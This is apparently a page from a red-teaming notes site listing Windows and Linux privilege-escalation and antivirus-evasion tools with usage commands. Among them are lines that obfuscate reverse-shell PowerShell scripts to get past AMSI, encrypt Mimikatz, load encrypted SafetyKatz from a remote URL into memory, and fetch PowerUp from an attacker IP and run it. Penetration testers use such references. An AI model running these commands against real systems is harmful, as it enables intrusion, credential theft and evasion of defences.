Red Teaming and Malware Analysis
@sirpedrotavaresseguranca-informatica.pt0xSI_f33d
Search…
⌃K
Links

Privilege Escalation

CrossC2: generate CobaltStrike's cross-platform payload.
/genCrossC2.Linux 127.0.0.1 4444 .cobaltstrike.beacon_keys null Linux x86 ./cross
TheFatRat: TheFatRat is an exploiting tool which compiles a malware with famous payload, and then the compiled maware can be executed on Linux , Windows , Mac and Android. TheFatRat Provides An Easy way to create Backdoors and Payload which can bypass most anti-virus.
traitor: Automatic Linux privesc via exploitation of low-hanging fruit e.g. gtfobins.

Windows

DKMC: Don't kill my cat is a tool that generates obfuscated shellcode that is stored inside of polyglot images. The image is 100% valid and also 100% valid shellcode. The idea is to avoid sandbox analysis since it's a simple "legit" image. For now the tool relies on PowerShell to execute the final shellcode payload.
darkarmour: Store and execute an encrypted windows binary from inside memory, without a single bit touching disk.
./darkarmour.py -f bins/meter.exe --encrypt xor --jmp -o bins/legit.exe --loop 5
donut: Donut is a position-independent code that enables in-memory execution of VBScript, JScript, EXE, DLL files and dotNET assemblies.
chimera: Chimera is a (shiny and very hack-ish) PowerShell obfuscation script designed to bypass AMSI and antivirus solutions. It digests malicious PS1's known to trigger AV and uses string substitution and variable concatenation to evade common detection signatures.
./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -o /tmp/chimera.ps1 -g -v -t -j -i -c -h -s -b -e
# "cmd.exe" isn't a data type but when wrapped in double-quotes, this works
# https://www.sparknotes.com/lit/harrypotter/section1/
./chimera.sh -f shells/generic1.ps1 -l 2 -o /tmp/chimera.ps1 -v -t cmd.exe -c /tmp/harry_potter.txt -i -h -s getstream -b new-object -j -g -k -r -p
./chimera.sh -f shells/generic2.ps1 -l 1 -o /tmp/chimera.ps1 -v -t -c -i -h -s excePTIon.InneRexcePTIon.message,getstream -b invoke-expression,new-object -j -g -k -r -p
./chimera.sh -f shells/generic3.ps1 -l 1 -o /tmp/chimera.ps1 -v -t -c -i -h -s equals,split,getstream -b new-object -j -g -k -r -p
# short strings like `-s pwd` are prone to breaking scrips
./chimera.sh -f shells/powershell_reverse_shell.ps1 -l 2 -o /tmp/chimera.ps1 -v -t -c -i -h -s getstream,close,pwd,ascii,write -b iex,out-string,new-object -j -g -k -r -p
# nishang scripts
./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,invoke-expression,out-string,write-error -j -g -k -r -p
./chimera.sh -f shells/Invoke-PowerShellTcpOneLine.ps1 -l 2 -o /tmp/chimera.ps1 -v -t -c -i -h -s getstream,read -b while,new-object,iex -j -g -k -r -p
Invoke-Stealth: This tool helps you to automate the obfuscation process of any script written in PowerShell with different techniques.
BetterXencrypt: A better version of Xencrypt.Xencrypt it self is a Powershell runtime crypter designed to evade AVs.
Encrypt C# file:
Invoke-SharpEncrypt -file C:\CSharpFiles\SafetyKatz.exe -password S3cur3Th1sSh1t -outfile C:\CSharpEncrypted\SafetyKatz.enc
Only full paths to the file are accepted at this point. The encrypted files generated by Invoke-SharpEncrypt can then be hosted on a web server on the Internet or stored on the target system on disk. Invoke-SharpLoader can be used to decrypt and execute the files in memory. Two examples demonstrate how to load a file from a remote webserver or from disk.
Load from URL:
Invoke-SharpLoader -location https://raw.githubusercontent.com/S3cur3Th1sSh1t/Invoke-SharpLoader/master/EncryptedCSharp/SafetyKatz.enc -password S3cur3Th1sSh1t -noArgs
Load from DISK:
Invoke-SharpLoader -location C:\EncryptedCSharp\Rubeus.enc -password S3cur3Th1sSh1t -argument kerberoast -argument2 "/format:hashcat"
Import-Module ./betterxencrypt.ps1
Invoke-BetterXencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1
Invoke-SharpLoader: Load encrypted and compressed C# Code from a remote Webserver or from a local file straight to memory and execute it there.
PEASS: Privilege Escalation Awesome Scripts SUITE.
deepce: Docker Enumeration, Escalation of Privileges and Container Escapes (DEEPCE).
unicorn: Magic Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
python unicorn.py harmless.ps1
python unicorn.py myfile.ps1 macro
python unicorn.py muahahaha.ps1 macro 500
InvisibilityCloak: Proof-of-concept obfuscation toolkit for C# post-exploitation tools.
Below is the difference in Seatbelt between unobfuscated and then obfuscated version with InvisibilityCloak against Microsoft Defender using Defender Check.
ScareCrow: ScareCrow - Payload creation framework designed around EDR bypass.
Before.
After.
PowerSploit: PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.
powershell Invoke-WebRequest http://10.10.14.14/PowerUp.ps1 -OutFile PowerUp.ps1
powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"
Powerless: Windows privilege escalation (enumeration) script designed with OSCP labs (legacy Windows) in mind.
Watson: Enumerate missing KBs and suggest exploits for useful Privilege Escalation vulnerabilities.
C:\> Watson.exe
__ __ _
/ / /\ \ \__ _| |_ ___ ___ _ __
\ \/ \/ / _` | __/ __|/ _ \| '_ \
\ /\ / (_| | |_\__ \ (_) | | | |
\/ \/ \__,_|\__|___/\___/|_| |_|
v2.0
@_RastaMouse
[*] OS Build Number: 14393
[*] Enumerating installed KBs...
[!] CVE-2019-0836 : VULNERABLE
[>] https://exploit-db.com/exploits/46718
[>] https://decoder.cloud/2019/04/29/combinig-luafv-postluafvpostreadwrite-race-condition-pe-with-diaghub-collector-exploit-from-standard-user-to-system/
[!] CVE-2019-0841 : VULNERABLE
[>] https://github.com/rogue-kdc/CVE-2019-0841
[>] https://rastamouse.me/tags/cve-2019-0841/
[!] CVE-2019-1064 : VULNERABLE
[>] https://www.rythmstick.net/posts/cve-2019-1064/
[!] CVE-2019-1130 : VULNERABLE
[>] https://github.com/S3cur3Th1sSh1t/SharpByeBear
Sherlock: PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.
JAWS: JAWS is a PowerShell script designed to help penetration testers (and CTFers) quickly identify potential privilege escalation vectors on Windows systems. It is written using PowerShell 2.0 so 'should' run on every Windows version since Windows 7.
AccessChk: Find misconfigured services.
accesschk.exe /accepteula
accesschk "power users" c:\windows\system32
accesschk.exe -uwcqv "Authenticated Users" *
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*
MineSweeper: Windows user-land hooks manipulation tool.
pe-sieve: Scans a given process. Recognizes and dumps a variety of potentially malicious implants (replaced/injected PEs, shellcodes, hooks, in-memory patches).
hollows_hunter: Scans all running processes. Recognizes and dumps a variety of potentially malicious implants (replaced/implanted PEs, shellcodes, hooks, in-memory patches).
SharpImpersonation: A User Impersonation tool - via Token or Shellcode injection.
PINKPHANTER: Windows x64 handcrafted token stealing kernel-mode shellcode
Koh: The Token Stealer.

Linux

gtfobins.github.io: GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.
LinEnum: Linux sh script for privesc.
/LinEnum.sh -s -k keyword -r report -e /tmp/ -t
pspy: unprivileged Linux process snooping.

Previous
Powershell
Next
Exfiltration
Last modified 6mo ago